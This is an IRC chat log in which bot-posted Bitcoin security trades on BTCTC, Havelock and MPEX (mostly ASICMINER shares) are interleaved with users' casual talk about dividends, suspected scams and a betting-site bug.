[BTCTC] [TAT.VIRTUALMINE] 281 @ 0.007003 = 1.9678 BTC [-] Jun 12 18:47:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.0256 BTC [-] Jun 12 18:48:29 [BTCTC] [ASICMINER-PT] 2 @ 2.549 = 5.098 BTC [-] Jun 12 18:49:15 [HAVELOCK] [ASICM] 1 @ 0.02535 BTC [+] Jun 12 18:52:15 Somebody said they saw Snowden leaving a bar with Jimmy Hoffa Jun 12 18:52:18 [BTCTC] [TAT.VIRTUALMINE] 199 @ 0.007003 = 1.3936 BTC [-] Jun 12 18:52:20 [BTCTC] [TAT.VIRTUALMINE] 2329 @ 0.007001 = 16.3053 BTC [-] Jun 12 18:52:21 [BTCTC] [TAT.VIRTUALMINE] 11 @ 0.007001 = 0.077 BTC [-] Jun 12 18:52:22 [BTCTC] [TAT.VIRTUALMINE] 19 @ 0.007001 = 0.133 BTC [-] Jun 12 18:52:49 [BTCTC] [TAT.VIRTUALMINE] 70 @ 0.007 = 0.49 BTC [-] Jun 12 18:53:02 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [-] Jun 12 18:53:18 [BTCTC] [TAT.VIRTUALMINE] 70 @ 0.007 = 0.49 BTC [-] Jun 12 18:53:28 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [-] Jun 12 18:54:10 [BITFUNDER] [DIVIDEND PAID] [TAT.VIRTUALMINE] 115,000 @ 0.00003223 Jun 12 18:54:26 [BTCTC] [ASICMINER-PT] 1 @ 2.549799 BTC [+] Jun 12 18:54:53 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [-] Jun 12 18:55:54 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [-] Jun 12 18:57:25 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0073 BTC [+] Jun 12 18:57:56 [HAVELOCK] [ASICM] 5 @ 0.02549999 = 0.1275 BTC [+] Jun 12 18:57:56 [HAVELOCK] [ASICM] 15 @ 0.02549999 = 0.3825 BTC [+] Jun 12 18:57:59 Since I paid dividends early on Havelock last week, I will be paying early on BTC-TC this week. Dividends for TAT.ASICMINER have been scheduled to be paid momentarily at 0.00034469 per share. Thanks! Jun 12 18:59:03 [HAVELOCK] [ASICM] 2 @ 0.02549999 = 0.051 BTC [+] Jun 12 19:00:59 [HAVELOCK] [ASICM] 204 @ 0.02549999 = 5.202 BTC [+] Jun 12 19:01:00 [HAVELOCK] [ASICM] 20 @ 0.0255 = 0.51 BTC [+] Jun 12 19:01:03 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [-] Jun 12 19:01:09 [BTCTC] [ASICMINER-PT] 2 @ 2.5499 = 5.0998 BTC [+] Jun 12 19:02:48 [HAVELOCK] [ASICM] 300 @ 0.0255 = 7.65 BTC [+] Jun 12 19:05:37 [HAVELOCK] [ASICM] 100 @ 0.025501 = 2.5501 BTC [+] Jun 12 19:05:46 your casascius lambo doesn't count Jun 12 19:06:23 ooo i see a few people playing with the trading API on havelock already Jun 12 19:06:24 exciting Jun 12 19:06:44 programmer boners Jun 12 19:07:54 [BTCTC] [TAT.ASICMINER] 5 @ 0.0256 = 0.128 BTC [-] Jun 12 19:08:17 [HAVELOCK] [ASICM] 235 @ 0.025501 = 5.9927 BTC [+] Jun 12 19:08:43 [HAVELOCK] [ASICM] 14 @ 0.0255 = 0.357 BTC [-] Jun 12 19:08:45 [BTCTC] [DMS.MINING] 5 @ 0.0295 = 0.1475 BTC [-] Jun 12 19:10:32 [BTCTC] [ASICMINER-PT] 6 @ 2.5499 = 15.2994 BTC [+] Jun 12 19:10:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.0256 BTC [-] Jun 12 19:14:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.0255 BTC [-] Jun 12 19:15:17 [BTCTC] [ASICMINER-PT] 4 @ 2.5499 = 10.1996 BTC [+] Jun 12 19:18:00 [BTCTC] [BTC-BOND] 3 @ 0.00984 = 0.0295 BTC [-] Jun 12 19:18:18 [BTCTC] [TAT.ASICMINER] 21 @ 0.0254 = 0.5334 BTC [-] Jun 12 19:18:22 [HAVELOCK] [ASICM] 50 @ 0.0255 = 1.275 BTC [-] Jun 12 19:19:49 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [-] Jun 12 19:20:12 [BTCTC] [TAT.ASICMINER] 2 @ 0.02539 = 0.0508 BTC [-] Jun 12 19:20:23 [BTCTC] [DMS.MINING] 1 @ 0.0295 BTC [-] Jun 12 19:20:31 [BTCTC] [TAT.ASICMINER] 2 @ 0.02539 = 0.0508 BTC [-] Jun 12 19:21:21 [BTCTC] [TAT.ASICMINER] 4 @ 0.025344 = 0.1014 BTC [-] Jun 12 19:21:26 vircurex stole over 3000 BQC from me! Jun 12 19:21:29 da fcuk is bqc Jun 12 19:21:33 [BTCTC] [TAT.ASICMINER] 36 @ 0.02531 = 0.9112 BTC [-] Jun 12 19:22:12 wasnt that bar-b-que coin? Jun 12 19:22:21 the one Jesus attacked Jun 12 19:22:28 [BTCTC] [TAT.ASICMINER] 49 @ 0.02531 = 1.2402 BTC [-] Jun 12 19:23:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.0253 BTC [-] Jun 12 19:23:49 [HAVELOCK] [ASICM] 43 @ 0.0255 = 1.0965 BTC [-] Jun 12 19:24:10 o o o Jun 12 19:24:14 completely slipped my mind Jun 12 19:24:43 [BTCTC] [TAT.ASICMINER] 3 @ 0.0253 = 0.0759 BTC [-] Jun 12 19:24:55 [BTCTC] [TAT.ASICMINER] 2 @ 0.0251 = 0.0502 BTC [-] Jun 12 19:25:00 [BTCTC] [TAT.ASICMINER] 2 @ 0.025062 = 0.0501 BTC [-] Jun 12 19:25:07 [BTCTC] [TAT.ASICMINER] 64 @ 0.025051 = 1.6033 BTC [-] Jun 12 19:27:10 [BTCTC] [B.YABMC] 1 @ 0.01 BTC [-] Jun 12 19:27:39 [HAVELOCK] [VTX] 1 @ 0.475 BTC [+] Jun 12 19:27:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.0252 BTC [+] Jun 12 19:27:46 https://bitcointalk.org/index.php?topic=137235.msg1466954#msg1466954 holy shit that's a good post. Jun 12 19:28:23 [BTCTC] [TAT.ASICMINER] 18 @ 0.025051 = 0.4509 BTC [-] Jun 12 19:28:53 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0073 = 0.0146 BTC [+] Jun 12 19:29:10 [HAVELOCK] [ASICM] 17 @ 0.0255 = 0.4335 BTC [-] Jun 12 19:29:46 I am in a complicated situation, I have 0,32 unpaid loans to be received before the 1st of June, for this reason I was late to pay my "investors" 0,57 the 1st of June but with an effort i went to pay yesterday (the funds are still in my account) but what a surprise!!! i have to pay 0,5 more by late payment. Jun 12 19:31:17 [BTCTC] [DMS.MINING] 59 @ 0.0295 = 1.7405 BTC [-] Jun 12 19:31:38 [BTCTC] [B.YABMC] 1 @ 0.012497 BTC [+] Jun 12 19:31:51 [BTCTC] [S.MPOE-PT] 6 @ 0.000709 = 0.0043 BTC [+] Jun 12 19:31:52 [BTCTC] [TAT.ASICMINER] 24 @ 0.025051 = 0.6012 BTC [-] Jun 12 19:32:41 [BTCTC] [TAT.ASICMINER] 27 @ 0.025051 = 0.6764 BTC [-] Jun 12 19:32:50 [BTCTC] [TAT.ASICMINER] 36 @ 0.025051 = 0.9018 BTC [-] Jun 12 19:32:53 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.0073 = 0.0365 BTC [+] Jun 12 19:33:08 [HAVELOCK] [ASICM] 1 @ 0.02559999 BTC [+] Jun 12 19:33:12 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00738 = 0.0148 BTC [+] Jun 12 19:33:36 [BTCTC] [TAT.VIRTUALMINE] 59 @ 0.00739 = 0.436 BTC [+] Jun 12 19:33:54 btcoracle.com <-- I discoverd a bug, DarkEmi says to stop betting until they figure it out. Don't know if they paused the site though. Jun 12 19:34:15 https://bitcointalk.org/index.php?topic=186353.new#new Jun 12 19:34:23 thought they were scamming me, nope, just a bug Jun 12 19:35:18 [BTCTC] [ASICMINER-PT] 4 @ 2.54988 = 10.1995 BTC [+] Jun 12 19:35:29 [BTCTC] [ASICMINER-PT] 1 @ 2.54989 BTC [+] Jun 12 19:35:34 [BTCTC] [TAT.VIRTUALMINE] 38 @ 0.00739 = 0.2808 BTC [+] Jun 12 19:36:20 [BTCTC] [DMS.SELLING] 25 @ 0.034107 = 0.8527 BTC [+] Jun 12 19:36:34 [BTCTC] [TAT.ASICMINER] 8 @ 0.02525 = 0.202 BTC [+] Jun 12 19:36:53 [BTCTC] [DMS.MINING] 30 @ 0.0295 = 0.885 BTC [-] Jun 12 19:38:32 [BTCTC] [TAT.VIRTUALMINE] 56 @ 0.00739 = 0.4138 BTC [+] Jun 12 19:39:14 http://www.youtube.com/watch?v=AnRDR8jEics Jun 12 19:39:25 [MPEX] [S.MPOE] 10950 @ 0.0007133 = 7.8106 BTC [-] Jun 12 19:39:50 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [-] Jun 12 19:40:17 [BTCTC] [ASICMINER-PT] 3 @ 2.54989 = 7.6497 BTC [+] Jun 12 19:41:31 [BTCTC] [BASIC-MINING] 1 @ 0.689999 BTC [-] Jun 12 19:41:41 [BTCTC] [DMS.MINING] 4 @ 0.0295 = 0.118 BTC [-] Jun 12 19:41:49 [BTCTC] [DMS.MINING] 9 @ 0.0295 = 0.2655 BTC [-] Jun 12 19:41:52 [BTCTC] [TAT.ASICMINER] 31 @ 0.025051 = 0.7766 BTC [-] Jun 12 19:41:57 [BTCTC] [TAT.ASICMINER] 22 @ 0.02501 = 0.5502 BTC [-] Jun 12 19:42:12 [BTCTC] [TAT.ASICMINER] 12 @ 0.025 = 0.3 BTC [-] Jun 12 19:42:17 this one wins http://www.youtube.com/watch?v=SeOOsm0BS24&NR=1&feature=endscreen Jun 12 19:43:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [-] Jun 12 19:43:25 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [-] Jun 12 19:43:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [-] Jun 12 19:44:08 [BTCTC] [DMS.PURCHASE] 100 @ 0.066163 = 6.6163 BTC [-] Jun 12 19:44:08 [BTCTC] [ASICMINER-PT] 1 @ 2.54989 BTC [+] Jun 12 19:44:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.02525 BTC [+] Jun 12 19:47:25 [BTCTC] [DMS.MINING] 1 @ 0.0295 BTC [-] Jun 12 19:48:26 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [-] Jun 12 19:48:32 [BTCTC] [ASICMINER-PT] 1 @ 2.5499 BTC [+] Jun 12 19:48:42 [BTCTC] [S.DICE-PT] 30 @ 0.002788 = 0.0836 BTC [+] Jun 12 19:49:00 [BTCTC] [DMS.MINING] 40 @ 0.0295 = 1.18 BTC [-] Jun 12 19:49:06 [BTCTC] [DMS.MINING] 273 @ 0.030498 = 8.326 BTC [+] Jun 12 19:49:10 [BTCTC] [DMS.MINING] 91 @ 0.030989 = 2.82 BTC [+] Jun 12 19:49:57 [BTCTC] [DMS.SELLING] 325 @ 0.034107 = 11.0848 BTC [+] Jun 12 19:50:19 [BTCTC] [DMS.SELLING] 20 @ 0.034106 = 0.6821 BTC [-] Jun 12 19:50:52 [BTCTC] [DMS.SELLING] 10 @ 0.034104 = 0.341 BTC [-] Jun 12 19:50:54 [BTCTC] [TAT.ASICMINER] 2 @ 0.025235 = 0.0505 BTC [-] Jun 12 19:51:35 [HAVELOCK] [ASICM] 352 @ 0.0255 = 8.976 BTC [-] Jun 12 19:57:02 [BTCTC] [TAT.ASICMINER] 2 @ 0.025 = 0.05 BTC [-] Jun 12 19:58:34 [BTCTC] [GSDPT] 1 @ 0.00251 BTC [+] Jun 12 19:59:02 [BTCTC] [TAT.ASICMINER] 4 @ 0.025 = 0.1 BTC [-] Jun 12 19:59:19 mircea, vircurex took your bbqcoin? that sucks... 3000 bqc == 0.12 btc right now Jun 12 19:59:39 not mine Jun 12 19:59:43 was a quote off forum Jun 12 19:59:47 i had no idea even wtf it is Jun 12 19:59:49 [BTCTC] [DMS.SELLING] 10 @ 0.034104 = 0.341 BTC [-] Jun 12 20:00:55 [BTCTC] [TAT.ASICMINER] 14 @ 0.025 = 0.35 BTC [-] Jun 12 20:01:36 lol Jun 12 20:01:45 i did see that you owe some money to some loan sharks Jun 12 20:01:51 [BTCTC] [GSDPT] 100 @ 0.002501 = 0.2501 BTC [-] Jun 12 20:01:52 they already doubled your fee Jun 12 20:01:53 :-( Jun 12 20:01:56 sorry to hear that Jun 12 20:02:01 [BTCTC] [DMS.SELLING] 90 @ 0.034104 = 3.0694 BTC [-] Jun 12 20:02:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [-] Jun 12 20:02:31 lol Jun 12 20:03:07 could've been your legs Jun 12 20:03:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [-] Jun 12 20:03:27 [HAVELOCK] [ASICM] 8 @ 0.02555 = 0.2044 BTC [+] Jun 12 20:03:36 deadweasel, don't get so wet about havelock: https://bitcointalk.org/index.php?topic=137235.msg2452814#msg2452814 Jun 12 20:03:42 [BTCTC] [DMS.SELLING] 200 @ 0.034104 = 6.8208 BTC [-] Jun 12 20:03:45 [BTCTC] [GSDPT] 150 @ 0.0025 = 0.375 BTC [-] Jun 12 20:04:39 [BTCTC] [DMS.SELLING] 90 @ 0.0331 = 2.979 BTC [-] Jun 12 20:06:34 I have no holdings there. Jun 12 20:07:19 ;;market Jun 12 20:07:19 Error: "market" is not a valid command. Jun 12 20:07:36 ;;market -h Jun 12 20:07:37 Error: The "Market" plugin is loaded, but there is no command named "-h" in it. Try "list Market" to see the commands in the "Market" plugin. Jun 12 20:08:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [-] Jun 12 20:09:45 [BTCTC] [TAT.ASICMINER] 2 @ 0.02499 = 0.05 BTC [-] Jun 12 20:10:00 [BTCTC] [TAT.ASICMINER] 8 @ 0.02499 = 0.1999 BTC [-] Jun 12 20:10:28 [BTCTC] [TAT.ASICMINER] 7 @ 0.025 = 0.175 BTC [+] Jun 12 20:10:45 [BTCTC] [TAT.ASICMINER] 10 @ 0.02497 = 0.2497 BTC [-] Jun 12 20:10:47 [BTCTC] [DMS.MINING] 30 @ 0.030998 = 0.9299 BTC [+] Jun 12 20:11:07 [BTCTC] [DMS.MINING] 100 @ 0.030999 = 3.0999 BTC [+] Jun 12 20:11:39 [BTCTC] [DMS.MINING] 100 @ 0.03142 = 3.142 BTC [+] Jun 12 20:12:05 [BTCTC] [DMS.MINING] 300 @ 0.031421 = 9.4263 BTC [+] Jun 12 20:12:30 [BTCTC] [DMS.MINING] 22 @ 0.0315 = 0.693 BTC [+] Jun 12 20:12:35 [BTCTC] [TAT.ASICMINER] 3 @ 0.025 = 0.075 BTC [+] Jun 12 20:13:39 [BTCTC] [TAT.ASICMINER] 2 @ 0.025 = 0.05 BTC [+] Jun 12 20:14:32 [BTCTC] [TAT.ASICMINER] 5 @ 0.025 = 0.125 BTC [+] Jun 12 20:14:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.0251 BTC [+] Jun 12 20:15:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.02498 BTC [-] Jun 12 20:15:12 [BTCTC] [ASICMINER-PT] 1 @ 2.5479 BTC [-] Jun 12 20:15:27 [BTCTC] [ASICMINER-PT] 2 @ 2.548 = 5.096 BTC [+] Jun 12 20:15:37 [BTCTC] [TAT.ASICMINER] 134 @ 0.02497 = 3.346 BTC [-] Jun 12 20:15:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.0251 BTC [+] Jun 12 20:15:52 [BTCTC] [ASICMINER-PT] 1 @ 2.54989 BTC [+] Jun 12 20:16:54 [BTCTC] [ASICMINER-PT] 1 @ 2.534 BTC [-] Jun 12 20:17:10 [BTCTC] [ASICMINER-PT] 1 @ 2.5325 BTC [-] Jun 12 20:17:32 [BTCTC] [S.DICE-PT] 8 @ 0.002789 = 0.0223 BTC [+] Jun 12 20:17:34 [BTCTC] [ASICMINER-PT] 1 @ 2.530101 BTC [-] Jun 12 20:19:23 [BTCTC] [TAT.ASICMINER] 5 @ 0.02489 = 0.1245 BTC [-] Jun 12 20:20:44 [BTCTC] [TAT.ASICMINER] 45 @ 0.024885 = 1.1198 BTC [-] Jun 12 20:20:52 [BTCTC] [DMS.MINING] 102 @ 0.032 = 3.264 BTC [+] Jun 12 20:21:12 [BTCTC] [DMS.MINING] 50 @ 0.0326 = 1.63 BTC [+] Jun 12 20:21:46 [BTCTC] [DMS.MINING] 20 @ 0.0329 = 0.658 BTC [+] Jun 12 20:21:51 [BTCTC] [TAT.ASICMINER] 2 @ 0.024851 = 0.0497 BTC [-] Jun 12 20:22:00 [BTCTC] [ASICMINER-PT] 3 @ 2.549 = 7.647 BTC [+] Jun 12 20:22:59 [BTCTC] [TAT.ASICMINER] 46 @ 0.024851 = 1.1431 BTC [-] Jun 12 20:23:08 [BTCTC] [ASICMINER-PT] 19 @ 2.5499 = 48.4481 BTC [+] Jun 12 20:23:10 [BTCTC] [DMS.MINING] 1 @ 0.032987 BTC [+] Jun 12 20:23:27 [HAVELOCK] [ASICM] 235 @ 0.02555 = 6.0043 BTC [+] Jun 12 20:24:01 [BTCTC] [ASICMINER-PT] 1 @ 2.5499 BTC [+] Jun 12 20:24:02 [BTCTC] [DMS.MINING] 76 @ 0.033 = 2.508 BTC [+] Jun 12 20:24:05 [BTCTC] [TAT.ASICMINER] 10 @ 0.025 = 0.25 BTC [+] Jun 12 20:24:46 [BTCTC] [S.DICE-PT] 19 @ 0.002789 = 0.053 BTC [+] Jun 12 20:24:58 [BTCTC] [DMS.MINING] 272 @ 0.03309 = 9.0005 BTC [+] Jun 12 20:25:41 [BTCTC] [S.DICE-PT] 84 @ 0.002795 = 0.2348 BTC [+] Jun 12 20:26:10 [BTCTC] [S.DICE-PT] 105 @ 0.002799 = 0.2939 BTC [+] Jun 12 20:26:49 [BTCTC] [S.DICE-PT] 495 @ 0.0028 = 1.386 BTC [+] Jun 12 20:26:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.0251 BTC [+] Jun 12 20:27:17 [BTCTC] [S.DICE-PT] 75 @ 0.00288 = 0.216 BTC [+] Jun 12 20:27:29 [BTCTC] [TAT.ASICMINER] 296 @ 0.0251 = 7.4296 BTC [+] Jun 12 20:27:43 [BTCTC] [S.DICE-PT] 1016 @ 0.002899 = 2.9454 BTC [+] Jun 12 20:27:43 [BTCTC] [TAT.ASICMINER] 12 @ 0.0251 = 0.3012 BTC [+] Jun 12 20:29:20 well this is kinda odd Jun 12 20:29:23 >>Hello, I came to China's foreign exchange trader, very optimistic about your Bitcoin transactions, how to become your agent, I have your Chinese domain name: www.bit4x.cn I can not be a Chinese platform, to helpyou promote the Chinese market, now Bitcoin market place in China Jun 12 20:29:46 name suqatters. Jun 12 20:30:02 [HAVELOCK] [HIM] 1 @ 0.2813 BTC [+] Jun 12 20:30:37 [HAVELOCK] [HIM] 4 @ 0.2813 = 1.1252 BTC [+] Jun 12 20:31:01 [BTCTC] [S.DICE-PT] 25 @ 0.002899 = 0.0725 BTC [+] Jun 12 20:31:02 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [-] Jun 12 20:31:28 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [-] Jun 12 20:31:48 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [-] Jun 12 20:32:11 [BTCTC] [TAT.ASICMINER] 17 @ 0.0251 = 0.4267 BTC [+] Jun 12 20:33:11 [HAVELOCK] [ASICM] 249 @ 0.02559999 = 6.3744 BTC [+] Jun 12 20:33:46 [BTCTC] [TAT.ASICMINER] 50 @ 0.02495 = 1.2475 BTC [-] Jun 12 20:34:16 [BITFUNDER] [DIVIDEND PAID] [TAT.ASICMINER] 20,762 @ 0.00034469 Jun 12 20:34:44 [BTCTC] [TAT.ASICMINER] 2 @ 0.0251 = 0.0502 BTC [+] Jun 12 20:35:15 [BTCTC] [ASICMINER-PT] 1 @ 2.544 BTC [-] Jun 12 20:35:37 [BTCTC] [TAT.ASICMINER] 50 @ 0.02486 = 1.243 BTC [-] Jun 12 20:36:03 [BTCTC] [TAT.ASICMINER] 101 @ 0.0251 = 2.5351 BTC [+] Jun 12 20:36:22 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [+] Jun 12 20:36:43 [BTCTC] [DMS.MINING] 4 @ 0.0332 = 0.1328 BTC [+] Jun 12 20:36:45 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [+] Jun 12 20:36:48 [BTCTC] [ASICMINER-PT] 7 @ 2.5499 = 17.8493 BTC [+] Jun 12 20:37:23 [BTCTC] [S.DICE-PT] 5 @ 0.002899 = 0.0145 BTC [+] Jun 12 20:38:29 [HAVELOCK] [ASICM] 16 @ 0.02559999 = 0.4096 BTC [+] Jun 12 20:38:30 [HAVELOCK] [ASICM] 39 @ 0.02556 = 0.9968 BTC [-] Jun 12 20:39:23 [BTCTC] [BITVPS] 3 @ 0.000709 = 0.0021 BTC [-] Jun 12 20:40:13 [BTCTC] [ASICMINER-PT] 1 @ 2.577 BTC [+] Jun 12 20:40:15 [BTCTC] [ASICMINER-PT] 1 @ 2.578 BTC [+] Jun 12 20:44:00 ThickAsThieves: dividends on havelock yet ? Jun 12 20:45:03 [BTCTC] [TAT.ASICMINER] 56 @ 0.0249 = 1.3944 BTC [-] Jun 12 20:45:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [+] Jun 12 20:48:59 [BTCTC] [TAT.ASICMINER] 14 @ 0.025 = 0.35 BTC [+] Jun 12 20:49:16 workin on it Jun 12 20:50:02 will be about an hour or so hopefully Jun 12 20:51:12 [BTCTC] [ASICMINER-PT] 1 @ 2.572 BTC [-] Jun 12 20:51:24 [BTCTC] [TAT.ASICMINER] 2 @ 0.0249 = 0.0498 BTC [-] Jun 12 20:51:47 [BTCTC] [TAT.ASICMINER] 3 @ 0.02487 = 0.0746 BTC [-] Jun 12 20:52:07 [BTCTC] [TAT.ASICMINER] 25 @ 0.02486 = 0.6215 BTC [-] Jun 12 20:52:46 [BTCTC] [TAT.ASICMINER] 18 @ 0.024851 = 0.4473 BTC [-] Jun 12 20:52:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.024851 BTC [-] Jun 12 20:53:03 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00738 BTC [-] Jun 12 20:53:46 [BTCTC] [TAT.ASICMINER] 9 @ 0.02485 = 0.2237 BTC [-] Jun 12 20:54:25 Chaaang-Noi: price dives after dividend is received Jun 12 20:54:58 people are weird Jun 12 20:55:14 maybe people that wanted out for some days Jun 12 20:55:18 and waited til div Jun 12 20:55:25 but still dumb Jun 12 20:55:34 [BTCTC] [TAT.ASICMINER] 25 @ 0.025 = 0.625 BTC [+] Jun 12 20:55:58 I have a feeling you'd sell some at 3btc Jun 12 20:56:15 I'm only a few hundred away from 5k Jun 12 20:56:25 (not within TAT.AM) Jun 12 20:56:31 only about 3k in TAT.AM Jun 12 20:57:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.02505 BTC [+] Jun 12 20:58:28 [BTCTC] [TAT.ASICMINER] 119 @ 0.02505 = 2.981 BTC [+] Jun 12 20:58:33 [BTCTC] [TAT.ASICMINER] 5 @ 0.02509 = 0.1255 BTC [+] Jun 12 21:00:22 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00738 BTC [-] Jun 12 21:00:42 [BTCTC] [BITVPS] 1 @ 0.000709 BTC [-] Jun 12 21:03:13 [HAVELOCK] [ASICM] 20 @ 0.0252 = 0.504 BTC [-] Jun 12 21:05:52 [BTCTC] [BITVPS] 4 @ 0.000709 = 0.0028 BTC [-] Jun 12 21:06:28 [MPEX] [S.MPOE] 2897 @ 0.0007133 = 2.0664 BTC [-] Jun 12 21:06:30 [MPEX] [S.MPOE] 5871 @ 0.0007135 = 4.189 BTC [+] Jun 12 21:06:31 [MPEX] [S.MPOE] 4516 @ 0.00071404 = 3.2246 BTC [+] Jun 12 21:06:47 [MPEX] [S.MPOE] 4716 @ 0.00071443 = 3.3693 BTC [+] Jun 12 21:14:00 [BTCTC] [BTC-BOND] 47 @ 0.00984 = 0.4625 BTC [-] Jun 12 21:14:02 [BTCTC] [BTC-BOND] 50 @ 0.00984 = 0.492 BTC [-] Jun 12 21:14:40 [BTCTC] [DMS.PURCHASE] 50 @ 0.066163 = 3.3082 BTC [-] Jun 12 21:14:56 [BTCTC] [TAT.ASICMINER] 120 @ 0.025 = 3 BTC [-] Jun 12 21:15:10 [BTCTC] [TAT.ASICMINER] 13 @ 0.025099 = 0.3263 BTC [+] Jun 12 21:15:58 [BTCTC] [DMS.PURCHASE] 36 @ 0.066163 = 2.3819 BTC [-] Jun 12 21:16:27 Dosen't matter. Jun 12 21:16:27 I'm going to say this now. I'm going to give this whole crazy thing a chance. A post from Todd would go a really long ways and would show us that all is not lost. Im going to put the hurt and anger aside, and I will put my faith in Todd. I'm not going to pressure him and I am just going to pray that this whole mess is worked out and he can get that scammer tag off his name. Todd, I believed in you when you started this Jun 12 21:16:27 , and I am going to believe in you now. Jun 12 21:16:27 I would like to ask anyone who feels the same way to post their support for Todd and BITBOND here and maybe we will look like fools, but maybe we wont and I would like to be able to sit back when this is all over and say that good does triumph over the bad. Godspeed Todd. Jun 12 21:18:45 [BTCTC] [TAT.ASICMINER] 250 @ 0.025098 = 6.2745 BTC [-] Jun 12 21:19:58 [BTCTC] [TAT.ASICMINER] 6 @ 0.025099 = 0.1506 BTC [+] Jun 12 21:21:38 [HAVELOCK] [VTX] 1 @ 0.477 BTC [+] Jun 12 21:22:16 is that tortilla talking? Jun 12 21:23:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.025099 BTC [+] Jun 12 21:24:29 [BTCTC] [TAT.ASICMINER] 9 @ 0.0251 = 0.2259 BTC [+] Jun 12 21:24:31 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.00738 = 0.0443 BTC [-] Jun 12 21:26:27 https://bitcointalk.org/index.php?topic=75126.msg2453681#msg2453681 Jun 12 21:26:29 just some guy Jun 12 21:27:24 [BTCTC] [ASICMINER-PT] 1 @ 2.569 BTC [-] Jun 12 21:27:55 bleh Jun 12 21:28:07 bitbond is unknown to me therefore i trust not Jun 12 21:28:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.0251 BTC [+] Jun 12 21:28:40 amazingrando Jun 12 21:28:46 giga's friend. Jun 12 21:28:56 ah Jun 12 21:29:14 still not my WoT circle Jun 12 21:29:29 almost thought gigavps has been afk for some time now Jun 12 21:29:35 yeah AG story is really sad Jun 12 21:29:46 eh Jun 12 21:29:47 AR Jun 12 21:29:49 or whatever Jun 12 21:30:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.0251 BTC [+] Jun 12 21:30:07 so the amazingrando has not disappeared with funds Jun 12 21:30:12 *now Jun 12 21:30:21 now = a while back Jun 12 21:30:23 [HAVELOCK] [ASICM] 50 @ 0.02567 = 1.2835 BTC [+] Jun 12 21:30:43 [MPEX] [S.MPOE] 9700 @ 0.00071443 = 6.93 BTC [+] Jun 12 21:30:48 i think it has been months now Jun 12 21:30:52 [BTCTC] [ASICMINER-PT] 1 @ 2.5695 BTC [+] Jun 12 21:31:05 time is arbitrary i cant tell well Jun 12 21:31:16 [HAVELOCK] [VTX] 2 @ 0.4879 = 0.9758 BTC [+] Jun 12 21:32:16 105% PPS seems legit for months Jun 12 21:32:50 not sure if anyone else noticed but every single pool or mining op offering greater than 100% pps has fallen Jun 12 21:33:02 as in disappeared with miner funds Jun 12 21:33:06 not rly Jun 12 21:33:12 [BTCTC] [TAT.ASICMINER] 4 @ 0.025099 = 0.1004 BTC [-] Jun 12 21:33:14 [BTCTC] [TAT.ASICMINER] 53 @ 0.025098 = 1.3302 BTC [-] Jun 12 21:33:21 psssh Jun 12 21:36:09 [BTCTC] [TAT.ASICMINER] 16 @ 0.025099 = 0.4016 BTC [+] Jun 12 21:37:26 [BTCTC] [TAT.ASICMINER] 39 @ 0.025099 = 0.9789 BTC [+] Jun 12 21:38:01 [HAVELOCK] [ASICM] 1 @ 0.02521 BTC [-] Jun 12 21:38:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.025099 BTC [+] Jun 12 21:38:25 [HAVELOCK] [ASICM] 80 @ 0.02567 = 2.0536 BTC [+] Jun 12 21:38:37 [BTCTC] [TAT.ASICMINER] 15 @ 0.025099 = 0.3765 BTC [+] Jun 12 21:40:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.025099 BTC [+] Jun 12 21:40:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.025099 BTC [+] Jun 12 21:42:47 [BTCTC] [TAT.VIRTUALMINE] 93 @ 0.00738 = 0.6863 BTC [-] Jun 12 21:42:49 [BTCTC] [TAT.VIRTUALMINE] 157 @ 0.00739 = 1.1602 BTC [+] Jun 12 21:42:58 [MPEX] [S.MPOE] 5434 @ 0.00071443 = 3.8822 BTC [+] Jun 12 21:43:00 [MPEX] [S.MPOE] 5500 @ 0.00071523 = 3.9338 BTC [+] Jun 12 21:43:04 [MPEX] [S.MPOE] 16807 @ 0.00071559 = 12.0269 BTC [+] Jun 12 21:43:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.025099 BTC [+] Jun 12 21:44:23 [BTCTC] [DMS.MINING] 55 @ 0.03299 = 1.8145 BTC [-] Jun 12 21:46:40 [BTCTC] [TAT.ASICMINER] 35 @ 0.025098 = 0.8784 BTC 